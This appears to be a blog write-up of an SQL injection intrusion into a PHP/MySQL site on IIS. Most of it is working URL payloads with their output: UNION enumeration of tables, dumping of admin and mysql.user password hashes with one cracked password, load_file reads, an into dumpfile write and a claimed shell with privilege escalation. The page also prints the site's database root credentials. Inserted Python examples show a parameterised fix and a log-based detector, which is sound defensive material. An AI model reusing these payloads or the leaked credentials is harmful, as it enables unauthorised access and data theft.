https://www.webshell.cc/answer_view.php?id=10291' // injectable
// The usual route: force an error. MySQL today is almost always a recent version, so there is normally no point guessing the version.

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

4,8,2 // the columns whose values are echoed in the page

// Switch to Firefox and force the error.

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database()
// Tables:
admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,vote,vote_save,zhidao

The columns are probably user, username or something similar. Better to dump them anyway.

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x61646D75736572

/*

id,username,password,id,username,password

*/

All that is left is the query. Echo positions: 2, 4, 8.

https://www.webshell.cc/answer_view.php?id=10291%20and%201=2%20union%20select%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admuser
User: chen
Password:2a0e926d20b06f13601c729602a9f24e
Cracked: chen2011
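The injection point is a numeric id concatenated straight into the SQL text, which is the only reason the UNION payloads above can turn an answer lookup into a read of admuser. The following is an added example, not the site's PHP and not code from this writeup, that models the lookup in Python with an in-memory sqlite database: the vulnerable function reproduces the UNION read, the hardened one validates the id and binds it as a parameter. The table names answer and admuser and the username/password columns come from the writeup; the three-column layout, the sample rows and the placeholder hash are constructed for the demo.

```python
"""Vulnerable vs hardened lookup, modelled on answer_view.php?id=...

Added example in Python/sqlite3; this is not the site's PHP and not code
from the writeup. Table names (answer, admuser) and the username/password
columns come from the writeup; the three-column layout, the sample rows and
the placeholder hash are constructed for this demo.
"""
import sqlite3


def make_db():
    """Build an in-memory database with one answer row and one (fake) admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE answer (id INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE admuser (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO answer VALUES (10291, 'an answer', 'some body text')")
    # constructed credential row: the hash value is a placeholder, not the page's
    conn.execute("INSERT INTO admuser VALUES (1, 'demo_admin', 'HASH_PLACEHOLDER')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, id_param):
    """The original pattern: the request parameter becomes part of the SQL text.

    A value such as "10291 and 1=2 union select 1,username,password from admuser"
    turns a three-column answer lookup into a read of the admin table, which is
    the UNION technique the writeup walks through.
    """
    sql = "SELECT id, title, body FROM answer WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def is_valid_id(id_param):
    """An id is a plain ASCII decimal string and nothing else."""
    return id_param.isascii() and id_param.isdigit()


def safe_lookup(conn, id_param):
    """Hardened form: validate the type, then bind the value as a parameter."""
    if not is_valid_id(id_param):
        raise ValueError("id must be a positive integer")
    # The placeholder keeps the value out of the SQL grammar entirely, so
    # neither a stray quote nor a UNION clause can change the statement.
    sql = "SELECT id, title, body FROM answer WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "10291 and 1=2 union select 1,username,password from admuser"
    print("vulnerable:", vulnerable_lookup(db, payload))   # leaks the admuser row
    print("safe:", safe_lookup(db, "10291"))
    try:
        safe_lookup(db, payload)
    except ValueError as exc:
        print("safe rejects payload:", exc)
```

The same fix applies to the 21-column query on the page: once the id is bound as an integer parameter there is no string into which union select can be spliced, and the column count the attacker had to match no longer matters.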
// Now the problem: can't find the admin backend.
https://www.webshell.cc/manage/ // later found out this one is fake
/* Stalemate.

Got the account and password, but can't find the backend. Thinking over the details I had skipped: I hadn't checked which database user, what privileges, or the database version.

*/

https://www.webshell.cc/answer_view.php?id=10291%20and%202=4%20union%20select%201,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
root!

Check whether we can write files:

https://www.webshell.cc/answer_view.php?id=10291%20and%20(select%20count(*)%20from%20MySQL.user)>0--
// Page renders normally, so yes. What remains is finding a path. Have a look at the database path first.

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex%28hex%28concat%280x5e5e5e,@@basedir,0x5e5e5e%29%29%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--

// Not usable.
Thinking about this, the blunt database dump from earlier can be done in a more advanced way:

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(table_schema,0x3a,table_name),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20information_schema.tables%20order%20by%20table_schema%20limit%200,50)%20t%20%20--
// Keep dumping

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(user,0x3a,password),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20mysql.user%20order%20by%20user%20limit%200,50)%20t%20%20--
The root hash came out. Unfortunately, it couldn't be cracked.

So the next thing to think of is the load_file function.

// See: PHP Security News, 8 AM edition (Sunday, 2011-11-13)

//http://hi.baidu.com/micropoor/blog/item/953acb6d896a6c7d0c33fac9.html

Since we want to use load_file, we have to check whether magic_quotes_gpc is off or on.

 

No error, so it's off.

Since it's a Windows box, it's either Apache or IIS. Judging from the response, it's IIS. So read the config file.

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--

Note the concat function!

// See PHP Security News on making use of the concat function
/* Correct response, so the read succeeded. View the page source!

Path: D:\web\Micropoor

Start writing!

*/

https://www.webshell.cc/pinglun.php?id=7387%20and%201=2%20union%20select%200,concat(char(116),char(101),char(115),char(116),char(13),char(10)),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20into%20dumpfile%20'd:%5C%5Cweb%5C%5CMicropoor%5C%5C1.txt'--
/*

Write succeeded; got a shell, then escalated privileges.

D:/web/Micropoor/conn.php is the config file

*/

$Host="localhost";

$Database="Micropoor";

$DbaUser ="root";

$DbaPassword="Micropoor";
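Every step of the chain above leaves a distinctive request in the web server log: a union select probe, information_schema lookups, user()/version(), a read of mysql.user, then load_file and into dumpfile. The following is an added example, not code from the writeup or from the site, that classifies such requests from access-log lines and decodes the hex literals so an analyst sees the real table and file names. The query strings are the ones quoted above; the cut-down IIS W3C-style line layout (date time c-ip method uri-stem uri-query status), the client address and the benign first line are constructed.

```python
"""Classify SQL-injection stages in web-server access-log lines.

Added example; not code from the writeup or from the site. The query strings
are the ones quoted in the writeup. The log-line layout (a cut-down IIS W3C
style: date time c-ip method uri-stem uri-query status), the client address
and the benign first line are constructed for this demo.
"""
import re
from urllib.parse import unquote

# Indicators ordered from most to least damaging; the first match is reported.
STAGES = [
    ("file-write",      r"\binto\s+(?:dump|out)file\b"),   # needs the FILE privilege
    ("file-read",       r"\bload_file\s*\("),              # needs the FILE privilege
    ("mysql-cred-dump", r"\bmysql\.user\b"),               # needs SELECT on the mysql schema
    ("server-recon",    r"@@(?:basedir|datadir|version)\b|\b(?:user|version)\s*\(\)"),
    ("schema-enum",     r"\binformation_schema\.(?:tables|columns)\b"),
    ("union-probe",     r"\bunion\s+(?:all\s+)?select\b"),
]

# Constructed log lines; the request stems and queries are those quoted in the writeup.
LOG_LINES = [
    "2011-11-13 08:00:00 192.0.2.10 GET /answer_view.php id=10291 200",
    "2011-11-13 08:00:01 192.0.2.10 GET /answer_view.php id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 200",
    "2011-11-13 08:00:02 192.0.2.10 GET /answer_view.php id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables%20where%20table_schema=database() 200",
    "2011-11-13 08:00:03 192.0.2.10 GET /answer_view.php id=10291%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns%20where%20table_name=0x61646D75736572 200",
    "2011-11-13 08:00:04 192.0.2.10 GET /answer_view.php id=10291%20and%202=4%20union%20select%201,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 200",
    "2011-11-13 08:00:05 192.0.2.10 GET /pinglun.php id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(user,0x3a,password),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20mysql.user%20order%20by%20user%20limit%200,50)%20t%20%20-- 200",
    "2011-11-13 08:00:06 192.0.2.10 GET /pinglun.php id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20-- 200",
    "2011-11-13 08:00:07 192.0.2.10 GET /pinglun.php id=7387%20and%201=2%20union%20select%200,concat(char(116),char(101),char(115),char(116),char(13),char(10)),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20into%20dumpfile%20'd:%5C%5Cweb%5C%5CMicropoor%5C%5C1.txt'-- 200",
]


def normalize(raw):
    """URL-decode repeatedly, lowercase, strip comment tricks, render hex literals."""
    s = raw
    for _ in range(3):                      # peel nested encodings: %2520 -> %20 -> ' '
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.lower()
    s = re.sub(r"/\*.*?\*/", " ", s)        # inline comments used to split keywords
    s = re.sub(r"\s+", " ", s)
    # 0x61646d75736572 -> 'admuser': show the analyst the real table or path name
    return re.sub(r"0x((?:[0-9a-f]{2})+)\b",
                  lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", s)


def classify(stem, query):
    """Return the most severe stage the request matches, or None if it looks benign."""
    s = normalize(stem + "?" + query)
    for stage, pattern in STAGES:
        if re.search(pattern, s):
            return stage
    return None


def scan(lines):
    """Return (client_ip, uri_stem, stage) for every line that looks like an injection attempt."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:                 # skip malformed lines
            continue
        c_ip, stem, query = fields[2], fields[4], fields[5]
        stage = classify(stem, query)
        if stage:
            hits.append((c_ip, stem, stage))
    return hits


if __name__ == "__main__":
    for c_ip, stem, stage in scan(LOG_LINES):
        print(f"{c_ip} {stem:<18} {stage}")
```

The last three stages only work because the application's database account holds the FILE privilege and can read the mysql schema, which is exactly what connecting as root (see conn.php above) hands it. An account restricted to its own schema, together with a secure_file_priv that is NULL or confined to a directory outside the web root, turns the load_file and into dumpfile requests into errors, and this scan still reports the attempt.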

When reposting please credit WebShell'S Blog; original article: https://www.webshell.cc/2134.html